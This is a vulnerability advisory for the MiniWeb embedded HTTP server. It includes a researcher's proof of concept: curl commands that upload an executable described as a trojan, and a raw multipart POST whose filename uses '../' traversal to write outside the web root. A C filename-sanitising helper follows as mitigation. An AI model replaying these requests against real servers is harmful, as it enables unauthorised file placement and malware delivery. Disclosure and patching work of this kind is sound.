
MiniWeb HTTP Server Directory Traversal and Arbitrary File Upload Vulnerabilities

Published: 2013-04-09
Updated: 2013-04-10

Affected systems:
sourceforge MiniWeb HTTP Server 0.x

Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58946
 
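MiniWeb is a miniature web server developed for embedded applications and written in C.
 
MiniWeb HTTP Server 20130309 and other versions contain a security vulnerability that lets an attacker upload malicious files to arbitrary locations on the server.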
 
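<*Source: Akastep
 
 Links: http://secunia.com/advisories/52923/
        http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt
 *>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Akastep () provided the following test method: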
 
Arbitrary File Upload:
 
user@myhost /cygdrive/c/dir1/dir2
 user@myhost /cygdrive/c/dir1/dir2
 $ curl -I www.example.com
 curl: (52) Empty reply from server
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com
 <html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
 width=35%><a href="../">..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
 table><hr><i>Directory content generated by MiniWeb</i></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 
$ #Uploading remotely our troyan to remote system.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe
http://192.168.0.15:8000/epicfail/
 HTTP/1.1 404 Not Found
 Server: MiniWeb
 Content-length: 125
 Content-Type: text/html
 
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 $ #Now fetching directory index from remote system.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com
 <html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
 width=35%><a href="../">..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
 r><td width=35%><a href="taskmgr.exe">taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
 00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 user@myhost /cygdrive/c/dir1/dir2
 
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design
flaw.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com/taskmgr.exe>task2.exe
 user@myhost /cygdrive/c/dir1/dir2
 $ file task2.exe
 task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
 
user@myhost /cygdrive/c/dir1/dir2
 $ rm -rf task2.exe
 
METHOD: POST
 URL: http://www.example.com/AAAAAAAAAAAAAAAAAAAAAAA
 
Directory Traversal:
 
Host: www.example.com
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: keep-alive
 Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
 Content-Length: 84906
 request body:
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="user"
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="pass"
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="file";
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
 Content-Type: image/png
 
Dude! Your machine OwnEd!
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="button"
 
Upload
 -----------------------------78522398122376--
 
================================================================================
 
Few Printscreens:
 
1remotesystem.PNG
 
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
 
2attackersends.PNG
 
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
 3remotesystempwned.PNG
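 http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
sourceforge
 -----------
 The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: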
 
http://miniweb.sourceforge.net/
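
With no vendor patch available, the traversal through the multipart `filename` field shown in the test method has to be stopped before the server builds the destination path. The following C code is an added example, not MiniWeb code and not part of the original advisory; the function name, the `/srv/upload` root, the 64-character limit and the character allowlist are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not MiniWeb code): turn the client-supplied multipart
 * filename into a path confined to upload_root. Returns 0 on success, -1 if
 * the name must be rejected. */
int confine_upload_path(const char *upload_root, const char *client_name,
                        char *out, size_t outlen)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    const char *base = client_name;
    const char *p;
    size_t len;
    int n;

    if (upload_root == NULL || client_name == NULL || out == NULL)
        return -1;

    /* Keep only the last path component. Both '/' and '\\' count as
     * separators because the server may be running on Windows. */
    for (p = client_name; *p != '\0'; p++)
        if (*p == '/' || *p == '\\')
            base = p + 1;

    len = strlen(base);
    if (len == 0 || len > 64)
        return -1;                 /* empty component ("dir/") or oversized */
    if (base[0] == '.')
        return -1;                 /* ".", ".." and hidden files */
    if (strspn(base, allowed) != len)
        return -1;                 /* ':', spaces, control characters, ... */

    n = snprintf(out, outlen, "%s/%s", upload_root, base);
    if (n < 0 || (size_t)n >= outlen)
        return -1;                 /* destination buffer too small */
    return 0;
}

int main(void)
{
    char path[128];
    /* Constructed input: the filename field from the request in the advisory. */
    const char *name = "../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt";

    if (confine_upload_path("/srv/upload", name, path, sizeof path) == 0)
        printf("stored as %s\n", path);
    return 0;
}
```

This addresses only the traversal; the unauthenticated upload itself still needs access control in front of the server.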